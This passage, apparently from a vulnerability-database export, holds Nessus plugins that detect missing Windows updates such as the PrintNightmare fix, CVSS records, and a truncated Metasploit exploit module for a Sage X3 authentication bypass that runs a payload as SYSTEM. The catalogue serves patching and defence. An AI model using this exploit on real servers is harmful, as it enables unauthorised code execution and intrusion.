An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004945.NASL", "href": "https://www.tenable.com/plugins/nessus/151471", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151471);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004945\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004945'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945])\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004947.NASL", "href": "https://www.tenable.com/plugins/nessus/151473", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151473);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004947\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004947'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004947])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004950.NASL", "href": "https://www.tenable.com/plugins/nessus/151475", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151475);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. 
An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004950\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004950'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004950])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-18T15:16:43", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42276, CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007215: Windows 11 Security Updates (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-34527", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2023-06-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007215.NASL", "href": "https://www.tenable.com/plugins/nessus/154997", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154997);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/17\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-34527\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSKB\", value:\"5007215\");\n script_xref(name:\"MSFT\", value:\"MS21-5007215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5007215: Windows 11 Security Updates (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. 
"published": "2015-07-20T23:59:00", "type": "prion", "title": "Directory traversal", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862"], "modified": "2019-02-05T19:25:00", "id": "PRION:CVE-2015-2862", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2015-2862", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T00:53:29", "description": "Windows Print Spooler Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T22:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-34527"], "modified": "2022-07-02T21:08:00", "id": "PRION:CVE-2021-34527", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-34527", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-12-03T17:20:42", "description": "This Metasploit module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an available AdxAdmin service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T00:00:00", "type": "zdt", "title": "Sage X3 Administration Service Authentication Bypass / Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7387", "CVE-2020-7388"], "modified": "2021-07-21T00:00:00", "id": "1337DAY-ID-36584", "href": "https://0day.today/exploit/description/36584", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GoodRanking\n\n include 
Msf::Exploit::Remote::Tcp\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',\n 'Description' => %q{\n This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.\n },\n 'Author' => [\n 'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk\n 'Aaron Herndon' # @ac3lives\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2021-07-07',\n 'References' =>\n [\n ['CVE', '2020-7387'], # Infoleak\n ['CVE', '2020-7388'], # RCE\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'CMD' => 'whoami'\n }\n }\n ],\n [\n 'Windows DLL',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Executable',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(1818)\n ]\n )\n end\n\n def vprint(msg = '')\n print(msg) if datastore['VERBOSE']\n end\n\n def check\n s = connect\n print_status('Connected')\n\n # ADXDIR command authentication header\n # allows for unauthenticated retrieval of X3 directory\n auth_packet = \"\\x09\\x00\"\n s.write(auth_packet)\n\n # recv response\n res = s.read(1024)\n\n if res.nil? 
|| res.length != 4\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n if res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"]\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n print_good('ADXDIR authentication successful.')\n\n # ADXDIR command\n adx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\"\n s.write(adx_dir_msg)\n directory = s.read(1024)\n\n return CheckCode::Safe if directory.nil?\n\n sagedir = directory[4..-2]\n print_good(format('Received directory info from host: %s', sagedir))\n disconnect\n\n CheckCode::Vulnerable(details: { sagedir: sagedir })\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def build_buffer(head, sage_payload, tail)\n buffer = ''\n\n # do things\n buffer << head if head\n buffer << sage_payload.length\n buffer << sage_payload\n buffer << tail if tail\n\n buffer\n end\n\n def write_file(sock, filenum, sage_payload, target, sagedir)\n s = sock\n\n # building the initial authentication packet\n # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]\n # Note: the first byte of this auth packet is different from the ADXDIR command\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n s.write(\"\\x06\\x00\")\n auth_resp = s.read(1024)\n\n fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4\n\n print_good('Command authentication successful.')\n\n # May require additional information such as file path\n # this will be used for multiple messages\n\n head = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head\n fmt = '@%s/tmp/cmd%s$cmd'\n fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'\n fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'\n pload = format(fmt, revsagedir, filenum)\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, pload, tail)\n s.write(sendbuf)\n s.read(1024)\n\n # Packet --- 3\n # Creating the packet that contains the command 
to run\n head = \"\\x02\\x00\\x05\\x08\\x00\\x00\\x00\"\n\n # this writes the data to the .cmd file to get executed\n # a single write can't be larger than ~250 bytes\n # so writes larger than 250 need to be broken up\n written = 0\n print_status('Writing data')\n\n while written < sage_payload.length\n vprint('.')\n\n towrite = sage_payload[written..written + 250]\n sendbuf = build_buffer(head, towrite, nil)\n s.write(sendbuf)\n s.recv(1024)\n\n written += towrite.length\n end\n\n vprint(\"\\r\\n\")\n end\n\n def exploit\n sage_payload = payload.encoded if target.name == 'Windows Command'\n sage_payload = generate_payload_dll if target.name == 'Windows DLL'\n sage_payload = generate_payload_exe if target.name == 'Windows Executable'\n\n sagedir = check.details[:sagedir]\n\n if sagedir.nil?\n fail_with(Failure::NotVulnerable,\n 'No directory was returned by the remote host, may not be vulnerable')\n end\n\n if sagedir.end_with?('AdxAdmin')\n register_dir_for_cleanup(\"#{sagedir}\\\\tmp\")\n end\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n filenum = rand_text_numeric(8)\n vprint_status(format('Using generated filename: %s', filenum))\n\n s = connect\n\n write_file(s, filenum, sage_payload, target.name, sagedir)\n\n unless target.name == 'Windows Command'\n disconnect\n # re-establish connection after writing file\n s = connect\n end\n\n if target.name == 'Windows DLL'\n sage_payload = \"rundll32.exe #{sagedir}\\\\tmp\\\\cmd#{filenum}.dll,0\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n if target.name == 'Windows Executable'\n sage_payload = \"#{sagedir}\\\\tmp\\\\cmd#{filenum}.exe\"\n vprint_status(sage_payload)\n write_file(s, filenum, sage_payload, nil, sagedir)\n end\n\n # Some sort of delimiter\n delim0 = \"\\x02\\x00\\x01\\x01\" 